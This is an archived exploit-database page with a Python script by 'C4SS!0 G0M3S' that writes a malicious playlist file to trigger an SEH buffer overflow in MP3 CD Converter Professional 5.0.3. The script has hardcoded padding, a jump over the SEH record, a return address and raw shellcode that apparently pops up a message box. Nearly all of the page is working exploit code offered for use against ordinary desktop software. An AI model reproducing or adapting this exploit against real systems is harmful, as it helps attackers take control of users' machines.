Home / os / win7

[local exploits] - MP3 CD Converter Professional BoF (SEH)

Posted on 20 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MP3 CD Converter Professional BoF (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MP3 CD Converter Professional BoF (SEH) by C4SS!0 G0M3S in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================= MP3 CD Converter Professional BoF (SEH) ======================================= #!/usr/bin/python # # #Python File Created BY C4SS!0 G0MES #http://www.invasao.com.br #Louredo_@hotmail.com # # #[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH) #[+]Date: 12/20/2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe #[+]Version: 5.0.3 #[+]Tested On: WIN-XP SP3 Virtual Box #[+]CVE: N/A # # # import os import sys import struct import time def usage(): os.system(&quot;cls&quot;) os.system(&quot;color 4f&quot;) print(&quot; &quot; &quot;===================================================================== &quot; &quot;|| || &quot; &quot;|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) || &quot; &quot;|| Author C4SS!0 G0M3S || ||&quot; &quot; || &quot; &quot;===================================================================== &quot;) print(&quot;[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)&quot;) print(&quot;[+]Date: 12/20/2010&quot;) print(&quot;[+]Author: C4SS!0 G0M3S&quot;) print(&quot;[+]E-mail: Louredo_@hotmail.com&quot;) print(&quot;[+]Home: http://www.invasao.com.br&quot;) print(&quot;[+]Impact: Hich&quot;) print(&quot;[+]Version: 5.0.3&quot;) print(&quot;[+]Country: Brazil &quot;) if len(sys.argv) !=2: usage() print &quot;[-]Usage: &quot;+sys.argv[0]+&quot; &lt;File Name&gt;&quot; print &quot;[-]Exemple: &quot;+sys.argv[0]+&quot; Exploit.pls&quot; sys.exit(0) buffer = &quot;x41&quot; * 780 nseh = &quot;xebx0dx90x90&quot; #JMP SHORT 14 seh = struct.pack(&#039;&lt;L&#039;,0x0077cebf) nops = &quot;x90&quot; * 10 usage() print &quot;[*]Identifying the length Shellcode&quot; time.sleep(1) shellcode = (&quot;x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50&quot; &quot;xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50&quot; &quot;xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43&quot; &quot;x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B&quot; &quot;x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6&quot;) print &quot;[*]The length is Shellcode:&quot;+str(len(shellcode)) time.sleep(1) payload = str(buffer+nseh+seh+nops+shellcode) print &quot;[*]Creating the Archive &quot;+sys.argv[1] time.sleep(1) file = sys.argv[1] try: f=open(file,&quot;w&quot;) f.write(payload) f.close() print &quot;[*]The Archive was created &quot;+str(file)+&quot; Success&quot; time.sleep(1) except: print &quot;[-]Error Creating File &quot;+file # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>

 

TOP